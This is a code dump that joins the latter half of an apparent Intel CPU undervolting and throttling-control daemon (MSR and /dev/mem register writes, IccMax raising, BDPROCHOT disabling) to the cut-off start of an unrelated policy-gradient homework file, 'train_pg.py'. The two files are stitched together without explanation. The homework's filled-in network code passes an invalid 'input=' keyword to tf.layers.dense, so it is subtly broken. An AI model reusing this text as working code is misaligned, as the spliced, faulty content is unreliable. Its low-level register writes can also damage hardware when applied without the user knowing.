(6, 86, 2): 'BroadwellDE',
(6, 86, 4): 'BroadwellDE',
(6, 87, 0): 'KnightsLanding',
(6, 87, 1): 'KnightsLanding',
(6, 90, 0): 'Moorefield',
(6, 92, 9): 'Apollo Lake',
(6, 93, 1): 'SoFIA',
(6, 94, 0): 'Skylake',
(6, 94, 3): 'Skylake-S',
(6, 95, 1): 'Denverton',
(6, 102, 3): 'Cannon Lake-U',
(6, 117, 10): 'Spreadtrum',
(6, 122, 1): 'Gemini Lake-D',
(6, 122, 8): 'GoldmontPlus',
(6, 126, 5): 'IceLakeY',
(6, 138, 1): 'Lakefield',
(6, 140, 1): 'TigerLake',
(6, 141, 1): 'TigerLake',
(6, 142, 9): 'Kabylake',
(6, 142, 10): 'Kabylake',
(6, 142, 11): 'WhiskeyLake',
(6, 142, 12): 'Comet Lake-U',
(6, 156, 0): 'JasperLake',
(6, 158, 9): 'KabylakeG',
(6, 158, 10): 'Coffeelake',
(6, 158, 11): 'Coffeelake',
(6, 158, 12): 'CoffeeLake',
(6, 158, 13): 'CoffeeLake',
(6, 165, 2): 'CometLake',
(6, 165, 4): 'CometLake',
(6, 165, 5): 'Comet Lake-S',
(6, 166, 0): 'CometLake',
(6, 167, 1): 'RocketLake',
}
TESTMSR = False
UNSUPPORTED_FEATURES = []
class bcolors:
YELLOW = '\033[93m'
GREEN = '\033[92m'
RED = '\033[91m'
RESET = '\033[0m'
BOLD = '\033[1m'
OK = bcolors.GREEN + bcolors.BOLD + 'OK' + bcolors.RESET
ERR = bcolors.RED + bcolors.BOLD + 'ERR' + bcolors.RESET
LIM = bcolors.YELLOW + bcolors.BOLD + 'LIM' + bcolors.RESET
log_history = set()
def log(msg, oneshot=False, end='\n'):
outfile = args.log if args.log else sys.stdout
if msg.strip() not in log_history or oneshot is False:
tstamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[:-3]
full_msg = '{:s}: {:s}'.format(tstamp, msg) if args.log else msg
print(full_msg, file=outfile, end=end)
log_history.add(msg.strip())
def fatal(msg, code=1, end='\n'):
outfile = args.log if args.log else sys.stderr
tstamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[:-3]
full_msg = '{:s}: [E] {:s}'.format(tstamp, msg) if args.log else '[E] {:s}'.format(msg)
print(full_msg, file=outfile, end=end)
sys.exit(code)
def warning(msg, oneshot=True, end='\n'):
outfile = args.log if args.log else sys.stderr
if msg.strip() not in log_history or oneshot is False:
tstamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[:-3]
full_msg = '{:s}: [W] {:s}'.format(tstamp, msg) if args.log else '[W] {:s}'.format(msg)
print(full_msg, file=outfile, end=end)
log_history.add(msg.strip())
def writemsr(msr, val):
msr_list = ['/dev/cpu/{:d}/msr'.format(x) for x in range(cpu_count())]
if not os.path.exists(msr_list[0]):
try:
subprocess.check_call(('modprobe', 'msr'))
except subprocess.CalledProcessError:
fatal('Unable to load the msr module.')
try:
for addr in msr_list:
f = os.open(addr, os.O_WRONLY)
os.lseek(f, MSR_DICT[msr], os.SEEK_SET)
os.write(f, struct.pack('Q', val))
os.close(f)
except (IOError, OSError) as e:
if TESTMSR:
raise e
if e.errno == EPERM or e.errno == EACCES:
fatal(
'Unable to write to MSR {} ({:x}). Try to disable Secure Boot '
'and check if your kernel does not restrict access to MSR.'.format(msr, MSR_DICT[msr])
)
elif e.errno == EIO:
fatal('Unable to write to MSR {} ({:x}). Unknown error.'.format(msr, MSR_DICT[msr]))
else:
raise e
# returns the value between from_bit and to_bit as unsigned long
def readmsr(msr, from_bit=0, to_bit=63, cpu=None, flatten=False):
assert cpu is None or cpu in range(cpu_count())
if from_bit > to_bit:
fatal('Wrong readmsr bit params')
msr_list = ['/dev/cpu/{:d}/msr'.format(x) for x in range(cpu_count())]
if not os.path.exists(msr_list[0]):
try:
subprocess.check_call(('modprobe', 'msr'))
except subprocess.CalledProcessError:
fatal('Unable to load the msr module.')
try:
output = []
for addr in msr_list:
f = os.open(addr, os.O_RDONLY)
os.lseek(f, MSR_DICT[msr], os.SEEK_SET)
val = struct.unpack('Q', os.read(f, 8))[0]
os.close(f)
output.append(get_value_for_bits(val, from_bit, to_bit))
if flatten:
if len(set(output)) > 1:
warning('Found multiple values for {:s} ({:x}). This should never happen.'.format(msr, MSR_DICT[msr]))
return output[0]
return output[cpu] if cpu is not None else output
except (IOError, OSError) as e:
if TESTMSR:
raise e
if e.errno == EPERM or e.errno == EACCES:
fatal('Unable to read from MSR {} ({:x}). Try to disable Secure Boot.'.format(msr, MSR_DICT[msr]))
elif e.errno == EIO:
fatal('Unable to read to MSR {} ({:x}). Unknown error.'.format(msr, MSR_DICT[msr]))
else:
raise e
def get_value_for_bits(val, from_bit=0, to_bit=63):
mask = sum(2 ** x for x in range(from_bit, to_bit + 1))
return (val & mask) >> from_bit
def set_msr_allow_writes():
log('[I] Trying to unlock MSR allow_writes.')
if not os.path.exists('/sys/module/msr'):
try:
subprocess.check_call(('modprobe', 'msr'))
except subprocess.CalledProcessError:
return
if os.path.exists('/sys/module/msr/parameters/allow_writes'):
try:
with open('/sys/module/msr/parameters/allow_writes', 'w') as f:
f.write('on')
except:
warning('Unable to set MSR allow_writes to on. You might experience warnings in kernel logs.')
def is_on_battery(config):
try:
for path in glob.glob(config.get('GENERAL', 'Sysfs_Power_Path', fallback=DEFAULT_SYSFS_POWER_PATH)):
with open(path) as f:
return not bool(int(f.read()))
raise
except:
warning('No valid Sysfs_Power_Path found! Trying upower method #1')
try:
out = subprocess.check_output(('upower', '-i', '/org/freedesktop/UPower/devices/line_power_AC'))
res = re.search(rb'online:\s+(yes|no)', out).group(1).decode().strip()
if res == 'yes':
return False
elif res == 'no':
return True
raise
except:
warning('Trying upower method #2')
try:
out = subprocess.check_output(('upower', '-i', '/org/freedesktop/UPower/devices/battery_BAT0'))
res = re.search(rb'state:\s+(.+)', out).group(1).decode().strip()
if res == 'discharging':
return True
elif res in ('fully-charged', 'charging'):
return False
except:
pass
warning('No valid power detection methods found. Assuming that the system is running on battery power.')
return True
def get_cpu_platform_info():
features_msr_value = readmsr('MSR_PLATFORM_INFO', cpu=0)
cpu_platform_info = {}
for key, value in platform_info_bits.items():
cpu_platform_info[key] = int(get_value_for_bits(features_msr_value, value[0], value[1]))
return cpu_platform_info
def get_reset_thermal_status():
# read thermal status
thermal_status_msr_value = readmsr('IA32_THERM_STATUS')
thermal_status = []
for core in range(cpu_count()):
thermal_status_core = {}
for key, value in thermal_status_bits.items():
thermal_status_core[key] = int(get_value_for_bits(thermal_status_msr_value[core], value[0], value[1]))
thermal_status.append(thermal_status_core)
# reset log bits
writemsr('IA32_THERM_STATUS', 0)
return thermal_status
def get_time_unit():
# 0.000977 is the time unit of my CPU
# TODO formula might be different for other CPUs
return 1.0 / 2 ** readmsr('MSR_RAPL_POWER_UNIT', 16, 19, cpu=0)
def get_power_unit():
# 0.125 is the power unit of my CPU
# TODO formula might be different for other CPUs
return 1.0 / 2 ** readmsr('MSR_RAPL_POWER_UNIT', 0, 3, cpu=0)
def get_critical_temp():
# the critical temperature for my CPU is 100 'C
return readmsr('MSR_TEMPERATURE_TARGET', 16, 23, cpu=0)
def get_cur_pkg_power_limits():
value = readmsr('MSR_PKG_POWER_LIMIT', 0, 55, flatten=True)
return {
'PL1': get_value_for_bits(value, 0, 14),
'TW1': get_value_for_bits(value, 17, 23),
'PL2': get_value_for_bits(value, 32, 46),
'TW2': get_value_for_bits(value, 49, 55),
}
def calc_time_window_vars(t):
time_unit = get_time_unit()
for Y in range(2 ** 5):
for Z in range(2 ** 2):
if t <= (2 ** Y) * (1.0 + Z / 4.0) * time_unit:
return (Y, Z)
raise ValueError('Unable to find a good combination!')
def calc_undervolt_msr(plane, offset):
"""Return the value to be written in the MSR 150h for setting the given
offset voltage (in mV) to the given voltage plane.
"""
assert offset <= 0
assert plane in VOLTAGE_PLANES
offset = int(round(offset * 1.024))
offset = 0xFFE00000 & ((offset & 0xFFF) << 21)
return 0x8000001100000000 | (VOLTAGE_PLANES[plane] << 40) | offset
def calc_undervolt_mv(msr_value):
"""Return the offset voltage (in mV) from the given raw MSR 150h value."""
offset = (msr_value & 0xFFE00000) >> 21
offset = offset if offset <= 0x400 else -(0x800 - offset)
return int(round(offset / 1.024))
def get_undervolt(plane=None, convert=False):
if 'UNDERVOLT' in UNSUPPORTED_FEATURES:
return 0
planes = [plane] if plane in VOLTAGE_PLANES else VOLTAGE_PLANES
out = {}
for plane in planes:
writemsr('MSR_OC_MAILBOX', 0x8000001000000000 | (VOLTAGE_PLANES[plane] << 40))
read_value = readmsr('MSR_OC_MAILBOX', flatten=True) & 0xFFFFFFFF
out[plane] = calc_undervolt_mv(read_value) if convert else read_value
return out
def undervolt(config):
if ('UNDERVOLT.{:s}'.format(power['source']) not in config and 'UNDERVOLT' not in config) or (
'UNDERVOLT' in UNSUPPORTED_FEATURES
):
return
for plane in VOLTAGE_PLANES:
write_offset_mv = config.getfloat(
'UNDERVOLT.{:s}'.format(power['source']), plane, fallback=config.getfloat('UNDERVOLT', plane, fallback=0.0)
)
write_value = calc_undervolt_msr(plane, write_offset_mv)
writemsr('MSR_OC_MAILBOX', write_value)
if args.debug:
write_value &= 0xFFFFFFFF
read_value = get_undervolt(plane)[plane]
read_offset_mv = calc_undervolt_mv(read_value)
match = OK if write_value == read_value else ERR
log(
'[D] Undervolt plane {:s} - write {:.0f} mV ({:#x}) - read {:.0f} mV ({:#x}) - match {}'.format(
plane, write_offset_mv, write_value, read_offset_mv, read_value, match
)
)
def calc_icc_max_msr(plane, current):
"""Return the value to be written in the MSR 150h for setting the given
IccMax (in A) to the given current plane.
"""
assert 0 < current <= 0x3FF
assert plane in CURRENT_PLANES
current = int(round(current * 4))
return 0x8000001700000000 | (CURRENT_PLANES[plane] << 40) | current
def calc_icc_max_amp(msr_value):
"""Return the max current (in A) from the given raw MSR 150h value."""
return (msr_value & 0x3FF) / 4.0
def get_icc_max(plane=None, convert=False):
planes = [plane] if plane in CURRENT_PLANES else CURRENT_PLANES
out = {}
for plane in planes:
writemsr('MSR_OC_MAILBOX', 0x8000001600000000 | (CURRENT_PLANES[plane] << 40))
read_value = readmsr('MSR_OC_MAILBOX', flatten=True) & 0x3FF
out[plane] = calc_icc_max_amp(read_value) if convert else read_value
return out
def set_icc_max(config):
for plane in CURRENT_PLANES:
try:
write_current_amp = config.getfloat(
'ICCMAX.{:s}'.format(power['source']), plane, fallback=config.getfloat('ICCMAX', plane, fallback=-1.0)
)
if write_current_amp > 0:
write_value = calc_icc_max_msr(plane, write_current_amp)
writemsr('MSR_OC_MAILBOX', write_value)
if args.debug:
write_value &= 0x3FF
read_value = get_icc_max(plane)[plane]
read_current_A = calc_icc_max_amp(read_value)
match = OK if write_value == read_value else ERR
log(
'[D] IccMax plane {:s} - write {:.2f} A ({:#x}) - read {:.2f} A ({:#x}) - match {}'.format(
plane, write_current_amp, write_value, read_current_A, read_value, match
)
)
except (configparser.NoSectionError, configparser.NoOptionError):
pass
def load_config():
config = configparser.ConfigParser()
config.read(args.config)
# config values sanity check
for power_source in ('AC', 'BATTERY'):
for option in ('Update_Rate_s', 'PL1_Tdp_W', 'PL1_Duration_s', 'PL2_Tdp_W', 'PL2_Duration_S'):
value = config.getfloat(power_source, option, fallback=None)
if value is not None:
value = config.set(power_source, option, str(max(0.001, value)))
elif option == 'Update_Rate_s':
fatal('The mandatory "Update_Rate_s" parameter is missing.')
trip_temp = config.getfloat(power_source, 'Trip_Temp_C', fallback=None)
if trip_temp is not None:
valid_trip_temp = min(TRIP_TEMP_RANGE[1], max(TRIP_TEMP_RANGE[0], trip_temp))
if trip_temp != valid_trip_temp:
config.set(power_source, 'Trip_Temp_C', str(valid_trip_temp))
log(
'[!] Overriding invalid "Trip_Temp_C" value in "{:s}": {:.1f} -> {:.1f}'.format(
power_source, trip_temp, valid_trip_temp
)
)
# fix any invalid value (ie. > 0) in the undervolt settings
for key in UNDERVOLT_KEYS:
for plane in VOLTAGE_PLANES:
if key in config:
value = config.getfloat(key, plane)
valid_value = min(0, value)
if value != valid_value:
config.set(key, plane, str(valid_value))
log(
'[!] Overriding invalid "{:s}" value in "{:s}" voltage plane: {:.0f} -> {:.0f}'.format(
key, plane, value, valid_value
)
)
# handle the case where only one of UNDERVOLT.AC, UNDERVOLT.BATTERY keys exists
# by forcing the other key to all zeros (ie. no undervolt)
if any(key in config for key in UNDERVOLT_KEYS[1:]):
for key in UNDERVOLT_KEYS[1:]:
if key not in config:
config.add_section(key)
for plane in VOLTAGE_PLANES:
value = config.getfloat(key, plane, fallback=0.0)
config.set(key, plane, str(value))
# Check for CORE/CACHE values mismatch
for key in UNDERVOLT_KEYS:
if key in config:
if config.getfloat(key, 'CORE', fallback=0) != config.getfloat(key, 'CACHE', fallback=0):
warning('On Skylake and newer CPUs CORE and CACHE values should match!')
break
iccmax_enabled = False
# check for invalid values (ie. <= 0 or > 0x3FF) in the IccMax settings
for key in ICCMAX_KEYS:
for plane in CURRENT_PLANES:
if key in config:
try:
value = config.getfloat(key, plane)
if value <= 0 or value >= 0x3FF:
raise ValueError
iccmax_enabled = True
except ValueError:
warning('Invalid value for {:s} in {:s}'.format(plane, key), oneshot=False)
config.remove_option(key, plane)
except configparser.NoOptionError:
pass
if iccmax_enabled:
warning('Warning! Raising IccMax above design limits can damage your system!')
return config
def calc_reg_values(platform_info, config):
regs = defaultdict(dict)
for power_source in ('AC', 'BATTERY'):
if platform_info['feature_programmable_temperature_target'] != 1:
warning("Setting temperature target is not supported by this CPU")
else:
# the critical temperature for my CPU is 100 'C
critical_temp = get_critical_temp()
# update the allowed temp range to keep at least 3 'C from the CPU critical temperature
global TRIP_TEMP_RANGE
TRIP_TEMP_RANGE[1] = min(TRIP_TEMP_RANGE[1], critical_temp - 3)
Trip_Temp_C = config.getfloat(power_source, 'Trip_Temp_C', fallback=None)
if Trip_Temp_C is not None:
trip_offset = int(round(critical_temp - Trip_Temp_C))
regs[power_source]['MSR_TEMPERATURE_TARGET'] = trip_offset << 24
else:
log('[I] {:s} trip temperature is disabled in config.'.format(power_source))
power_unit = get_power_unit()
PL1_Tdp_W = config.getfloat(power_source, 'PL1_Tdp_W', fallback=None)
PL1_Duration_s = config.getfloat(power_source, 'PL1_Duration_s', fallback=None)
PL2_Tdp_W = config.getfloat(power_source, 'PL2_Tdp_W', fallback=None)
PL2_Duration_s = config.getfloat(power_source, 'PL2_Duration_s', fallback=None)
if (PL1_Tdp_W, PL1_Duration_s, PL2_Tdp_W, PL2_Duration_s).count(None) < 4:
cur_pkg_power_limits = get_cur_pkg_power_limits()
if PL1_Tdp_W is None:
PL1 = cur_pkg_power_limits['PL1']
log('[I] {:s} PL1_Tdp_W disabled in config.'.format(power_source))
else:
PL1 = int(round(PL1_Tdp_W / power_unit))
if PL1_Duration_s is None:
TW1 = cur_pkg_power_limits['TW1']
log('[I] {:s} PL1_Duration_s disabled in config.'.format(power_source))
else:
Y, Z = calc_time_window_vars(PL1_Duration_s)
TW1 = Y | (Z << 5)
if PL2_Tdp_W is None:
PL2 = cur_pkg_power_limits['PL2']
log('[I] {:s} PL2_Tdp_W disabled in config.'.format(power_source))
else:
PL2 = int(round(PL2_Tdp_W / power_unit))
if PL2_Duration_s is None:
TW2 = cur_pkg_power_limits['TW2']
log('[I] {:s} PL2_Duration_s disabled in config.'.format(power_source))
else:
Y, Z = calc_time_window_vars(PL2_Duration_s)
TW2 = Y | (Z << 5)
regs[power_source]['MSR_PKG_POWER_LIMIT'] = (
PL1 | (1 << 15) | (1 << 16) | (TW1 << 17) | (PL2 << 32) | (1 << 47) | (TW2 << 49)
)
else:
log('[I] {:s} package power limits are disabled in config.'.format(power_source))
# cTDP
c_tdp_target_value = config.getint(power_source, 'cTDP', fallback=None)
if c_tdp_target_value is not None:
if platform_info['feature_programmable_tdp_limit'] != 1:
log("[W] cTDP setting not supported by this CPU")
elif platform_info['number_of_additional_tdp_profiles'] < c_tdp_target_value:
log("[W] the configured cTDP profile is not supported by this CPU")
else:
valid_c_tdp_target_value = max(0, c_tdp_target_value)
regs[power_source]['MSR_CONFIG_TDP_CONTROL'] = valid_c_tdp_target_value
return regs
def set_hwp(performance_mode):
if performance_mode not in (True, False) or 'HWP' in UNSUPPORTED_FEATURES:
return
# set HWP energy performance preference
cur_val = readmsr('IA32_HWP_REQUEST', cpu=0)
hwp_mode = HWP_PERFORMANCE_VALUE if performance_mode is True else HWP_DEFAULT_VALUE
new_val = (cur_val & 0xFFFFFFFF00FFFFFF) | (hwp_mode << 24)
writemsr('IA32_HWP_REQUEST', new_val)
if args.debug:
read_value = readmsr('IA32_HWP_REQUEST', from_bit=24, to_bit=31)[0]
match = OK if hwp_mode == read_value else ERR
log('[D] HWP - write "{:#02x}" - read "{:#02x}" - match {}'.format(hwp_mode, read_value, match))
def set_disable_bdprochot():
# Disable BDPROCHOT
cur_val = readmsr('MSR_POWER_CTL', flatten=True)
new_val = cur_val & 0xFFFFFFFFFFFFFFFE
writemsr('MSR_POWER_CTL', new_val)
if args.debug:
read_value = readmsr('MSR_POWER_CTL', from_bit=0, to_bit=0)[0]
match = OK if ~read_value else ERR
log('[D] BDPROCHOT - write "{:#02x}" - read "{:#02x}" - match {}'.format(0, read_value, match))
def get_config_write_time():
try:
return os.stat(args.config).st_mtime
except FileNotFoundError:
return None
def reload_config():
config = load_config()
regs = calc_reg_values(get_cpu_platform_info(), config)
undervolt(config)
set_icc_max(config)
set_hwp(config.getboolean('AC', 'HWP_Mode', fallback=None))
log('[I] Reloading changes.')
return config, regs
def power_thread(config, regs, exit_event):
try:
mchbar_mmio = MMIO(0xFED159A0, 8)
except MMIOError:
warning('Unable to open /dev/mem. TDP override might not work correctly.')
warning('Try to disable Secure Boot and/or enable CONFIG_DEVMEM in kernel config.')
mchbar_mmio = None
next_hwp_write = 0
last_config_write_time = (
get_config_write_time() if config.getboolean('GENERAL', 'Autoreload', fallback=False) else None
)
while not exit_event.is_set():
# log thermal status
if args.debug:
thermal_status = get_reset_thermal_status()
for index, core_thermal_status in enumerate(thermal_status):
for key, value in core_thermal_status.items():
log('[D] core {} thermal status: {} = {}'.format(index, key.replace("_", " "), value))
# Reload config on changes (unless it's deleted)
if config.getboolean('GENERAL', 'Autoreload', fallback=False):
config_write_time = get_config_write_time()
if config_write_time and last_config_write_time != config_write_time:
last_config_write_time = config_write_time
config, regs = reload_config()
# switch back to sysfs polling
if power['method'] == 'polling':
power['source'] = 'BATTERY' if is_on_battery(config) else 'AC'
# set temperature trip point
if 'MSR_TEMPERATURE_TARGET' in regs[power['source']]:
write_value = regs[power['source']]['MSR_TEMPERATURE_TARGET']
writemsr('MSR_TEMPERATURE_TARGET', write_value)
if args.debug:
read_value = readmsr('MSR_TEMPERATURE_TARGET', 24, 29, flatten=True)
match = OK if write_value >> 24 == read_value else ERR
log(
'[D] TEMPERATURE_TARGET - write {:#x} - read {:#x} - match {}'.format(
write_value >> 24, read_value, match
)
)
# set cTDP
if 'MSR_CONFIG_TDP_CONTROL' in regs[power['source']]:
write_value = regs[power['source']]['MSR_CONFIG_TDP_CONTROL']
writemsr('MSR_CONFIG_TDP_CONTROL', write_value)
if args.debug:
read_value = readmsr('MSR_CONFIG_TDP_CONTROL', 0, 1, flatten=True)
match = OK if write_value == read_value else ERR
log(
'[D] CONFIG_TDP_CONTROL - write {:#x} - read {:#x} - match {}'.format(
write_value, read_value, match
)
)
# set PL1/2 on MSR
write_value = regs[power['source']]['MSR_PKG_POWER_LIMIT']
writemsr('MSR_PKG_POWER_LIMIT', write_value)
if args.debug:
read_value = readmsr('MSR_PKG_POWER_LIMIT', 0, 55, flatten=True)
match = OK if write_value == read_value else ERR
log(
'[D] MSR PACKAGE_POWER_LIMIT - write {:#x} - read {:#x} - match {}'.format(
write_value, read_value, match
)
)
if mchbar_mmio is not None:
# set MCHBAR register to the same PL1/2 values
mchbar_mmio.write32(0, write_value & 0xFFFFFFFF)
mchbar_mmio.write32(4, write_value >> 32)
if args.debug:
read_value = mchbar_mmio.read32(0) | (mchbar_mmio.read32(4) << 32)
match = OK if write_value == read_value else ERR
log(
'[D] MCHBAR PACKAGE_POWER_LIMIT - write {:#x} - read {:#x} - match {}'.format(
write_value, read_value, match
)
)
# Disable BDPROCHOT
disable_bdprochot = config.getboolean(power['source'], 'Disable_BDPROCHOT', fallback=None)
if disable_bdprochot:
set_disable_bdprochot()
wait_t = config.getfloat(power['source'], 'Update_Rate_s')
enable_hwp_mode = config.getboolean('AC', 'HWP_Mode', fallback=None)
# set HWP less frequently. Just to be safe since (e.g.) TLP might reset this value
if (
enable_hwp_mode
and next_hwp_write <= time()
and (
(power['method'] == 'dbus' and power['source'] == 'AC')
or (power['method'] == 'polling' and not is_on_battery(config))
)
):
set_hwp(enable_hwp_mode)
next_hwp_write = time() + HWP_INTERVAL
else:
exit_event.wait(wait_t)
def check_kernel():
if os.geteuid() != 0:
fatal('No root no party. Try again with sudo.')
kernel_config = None
try:
with open(os.path.join('/boot', 'config-{:s}'.format(uname()[2]))) as f:
kernel_config = f.read()
except IOError:
config_gz_path = os.path.join('/proc', 'config.gz')
try:
if not os.path.isfile(config_gz_path):
subprocess.check_call(('modprobe', 'configs'))
with gzip.open(config_gz_path) as f:
kernel_config = f.read().decode()
except (subprocess.CalledProcessError, IOError):
pass
if kernel_config is None:
log('[W] Unable to obtain and validate kernel config.')
return
elif not re.search('CONFIG_DEVMEM=y', kernel_config):
warning('Bad kernel config: you need CONFIG_DEVMEM=y.')
if not re.search('CONFIG_X86_MSR=(y|m)', kernel_config):
fatal('Bad kernel config: you need CONFIG_X86_MSR builtin or as module.')
def check_cpu():
try:
with open('/proc/cpuinfo') as f:
cpuinfo = {}
for row in f.readlines():
try:
key, value = map(lambda x: x.strip(), row.split(':'))
if key == 'processor' and value == '1':
break
try:
cpuinfo[key] = int(value, 0)
except ValueError:
cpuinfo[key] = value
except ValueError:
pass
if cpuinfo['vendor_id'] != 'GenuineIntel':
fatal('This tool is designed for Intel CPUs only.')
cpuid = (cpuinfo['cpu family'], cpuinfo['model'], cpuinfo['stepping'])
if cpuid not in supported_cpus:
fatal(
'Your CPU model is not supported.\n\n'
'Please open a new issue (https://github.com/erpalma/throttled/issues) specifying:\n'
' - model name\n'
' - cpu family\n'
' - model\n'
' - stepping\n'
'from /proc/cpuinfo.'
)
log('[I] Detected CPU architecture: Intel {:s}'.format(supported_cpus[cpuid]))
except SystemExit:
sys.exit(1)
except:
fatal('Unable to identify CPU model.')
def test_msr_rw_capabilities():
TESTMSR = True
try:
log('[I] Testing if undervolt is supported...')
get_undervolt()
except:
warning('Undervolt seems not to be supported by your system, disabling.')
UNSUPPORTED_FEATURES.append('UNDERVOLT')
try:
log('[I] Testing if HWP is supported...')
cur_val = readmsr('IA32_HWP_REQUEST', cpu=0)
writemsr('IA32_HWP_REQUEST', cur_val)
except:
warning('HWP seems not to be supported by your system, disabling.')
UNSUPPORTED_FEATURES.append('HWP')
TESTMSR = False
def monitor(exit_event, wait):
wait = max(0.1, wait)
rapl_power_unit = 0.5 ** readmsr('MSR_RAPL_POWER_UNIT', from_bit=8, to_bit=12, cpu=0)
power_plane_msr = {
'Package': 'MSR_INTEL_PKG_ENERGY_STATUS',
'Graphics': 'MSR_PP1_ENERGY_STATUS',
'DRAM': 'MSR_DRAM_ENERGY_STATUS',
}
prev_energy = {
'Package': (readmsr('MSR_INTEL_PKG_ENERGY_STATUS', cpu=0) * rapl_power_unit, time()),
'Graphics': (readmsr('MSR_PP1_ENERGY_STATUS', cpu=0) * rapl_power_unit, time()),
'DRAM': (readmsr('MSR_DRAM_ENERGY_STATUS', cpu=0) * rapl_power_unit, time()),
}
undervolt_values = get_undervolt(convert=True)
undervolt_output = ' | '.join('{:s}: {:.2f} mV'.format(plane, undervolt_values[plane]) for plane in VOLTAGE_PLANES)
log('[D] Undervolt offsets: {:s}'.format(undervolt_output))
iccmax_values = get_icc_max(convert=True)
iccmax_output = ' | '.join('{:s}: {:.2f} A'.format(plane, iccmax_values[plane]) for plane in CURRENT_PLANES)
log('[D] IccMax: {:s}'.format(iccmax_output))
log('[D] Realtime monitoring of throttling causes:\n')
while not exit_event.is_set():
value = readmsr('IA32_THERM_STATUS', from_bit=0, to_bit=15, cpu=0)
offsets = {'Thermal': 0, 'Power': 10, 'Current': 12, 'Cross-domain (e.g. GPU)': 14}
output = ('{:s}: {:s}'.format(cause, LIM if bool((value >> offsets[cause]) & 1) else OK) for cause in offsets)
# ugly code, just testing...
vcore = readmsr('IA32_PERF_STATUS', from_bit=32, to_bit=47, cpu=0) / (2.0 ** 13) * 1000
stats2 = {'VCore': '{:.0f} mV'.format(vcore)}
total = 0.0
for power_plane in ('Package', 'Graphics', 'DRAM'):
energy_j = readmsr(power_plane_msr[power_plane], cpu=0) * rapl_power_unit
now = time()
prev_energy[power_plane], energy_w = (
(energy_j, now),
(energy_j - prev_energy[power_plane][0]) / (now - prev_energy[power_plane][1]),
)
stats2[power_plane] = '{:.1f} W'.format(energy_w)
total += energy_w
stats2['Total'] = '{:.1f} W'.format(total)
output2 = ('{:s}: {:s}'.format(label, stats2[label]) for label in stats2)
terminator = '\n' if args.log else '\r'
log(
'[{}] {} || {}{}'.format(power['source'], ' - '.join(output), ' - '.join(output2), ' ' * 10),
end=terminator,
)
exit_event.wait(wait)
def main():
global args
parser = argparse.ArgumentParser()
exclusive_group = parser.add_mutually_exclusive_group()
exclusive_group.add_argument('--debug', action='store_true', help='add some debug info and additional checks')
exclusive_group.add_argument(
'--monitor',
metavar='update_rate',
const=1.0,
type=float,
nargs='?',
help='realtime monitoring of throttling causes (default 1s)',
)
parser.add_argument('--config', default='/etc/throttled.conf', help='override default config file path')
parser.add_argument('--force', action='store_true', help='bypass compatibility checks (EXPERTS only)')
parser.add_argument('--log', metavar='/path/to/file', help='log to file instead of stdout')
args = parser.parse_args()
if args.log:
try:
args.log = open(args.log, 'w')
except:
args.log = None
fatal('Unable to write to the log file!')
if not args.force:
check_kernel()
check_cpu()
set_msr_allow_writes()
test_msr_rw_capabilities()
log('[I] Loading config file.')
config = load_config()
power['source'] = 'BATTERY' if is_on_battery(config) else 'AC'
platform_info = get_cpu_platform_info()
if args.debug:
for key, value in platform_info.items():
log('[D] cpu platform info: {} = {}'.format(key.replace("_", " "), value))
regs = calc_reg_values(platform_info, config)
if not config.getboolean('GENERAL', 'Enabled'):
log('[I] Throttled is disabled in config file... Quitting. :(')
return
undervolt(config)
set_icc_max(config)
set_hwp(config.getboolean('AC', 'HWP_Mode', fallback=None))
exit_event = Event()
thread = Thread(target=power_thread, args=(config, regs, exit_event))
thread.daemon = True
thread.start()
# handle dbus events for applying undervolt/IccMax on resume from sleep/hibernate
def handle_sleep_callback(sleeping):
if not sleeping:
undervolt(config)
set_icc_max(config)
def handle_ac_callback(*args):
try:
power['source'] = 'BATTERY' if args[1]['Online'] == 0 else 'AC'
power['method'] = 'dbus'
except:
power['method'] = 'polling'
DBusGMainLoop(set_as_default=True)
bus = dbus.SystemBus()
# add dbus receiver only if undervolt/IccMax is enabled in config
if any(
config.getfloat(key, plane, fallback=0) != 0 for plane in VOLTAGE_PLANES for key in UNDERVOLT_KEYS + ICCMAX_KEYS
):
bus.add_signal_receiver(
handle_sleep_callback, 'PrepareForSleep', 'org.freedesktop.login1.Manager', 'org.freedesktop.login1'
)
bus.add_signal_receiver(
handle_ac_callback,
signal_name="PropertiesChanged",
dbus_interface="org.freedesktop.DBus.Properties",
path="/org/freedesktop/UPower/devices/line_power_AC",
)
log('[I] Starting main loop.')
if args.monitor is not None:
monitor_thread = Thread(target=monitor, args=(exit_event, args.monitor))
monitor_thread.daemon = True
monitor_thread.start()
try:
loop = GLib.MainLoop()
loop.run()
except (KeyboardInterrupt, SystemExit):
pass
exit_event.set()
loop.quit()
thread.join(timeout=1)
if args.monitor is not None:
monitor_thread.join(timeout=0.1)
if __name__ == '__main__':
main()
|
train_pg.py | import numpy as np
import tensorflow as tf
import gym
import logz
import scipy.signal
import os
import time
import inspect
from multiprocessing import Process
#============================================================================================#
# Utilities
#============================================================================================#
def build_mlp(
input_placeholder,
output_size,
scope,
n_layers=2,
size=64,
activation=tf.tanh,
output_activation=None
):
#========================================================================================#
# ----------SECTION 3----------
# Network building
#
# Your code should make a feedforward neural network (also called a multilayer perceptron)
# with 'n_layers' hidden layers of size 'size' units.
#
# The output layer should have size 'output_size' and activation 'output_activation'.
#
# Hint: use tf.layers.dense
#========================================================================================#
with tf.variable_scope(scope):
# YOUR_CODE_HERE
out = input_placeholder
for l in range(n_layers):
out = tf.layers.dense(input=out, units=size, activation=activation)
out = tf.layers.dense(input=out, units=output_size, activation=output_activation)
return out
def pathlength(path):
return len(path["reward"])
#============================================================================================#
# Policy Gradient
#============================================================================================#
def train_PG(exp_name='',
env_name='CartPole-v0',
n_iter=100,
gamma=1.0,
min_timesteps_per_batch=1000,
max_path_length=None,
learning_rate=5e-3,
reward_to_go=True,
animate=True,
logdir=None,
normalize_advantages=True,
nn_baseline=False,
seed=0,
# network arguments
n_layers=1,
size=32
):
start = time.time()
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_PG)[0]
locals_ = locals()
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
# Make the gym environment
env = gym.make(env_name)
# Is this env continuous, or discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
#========================================================================================#
# Notes on notation:
#
# Symbolic variables have the prefix sy_, to distinguish them from the numerical values
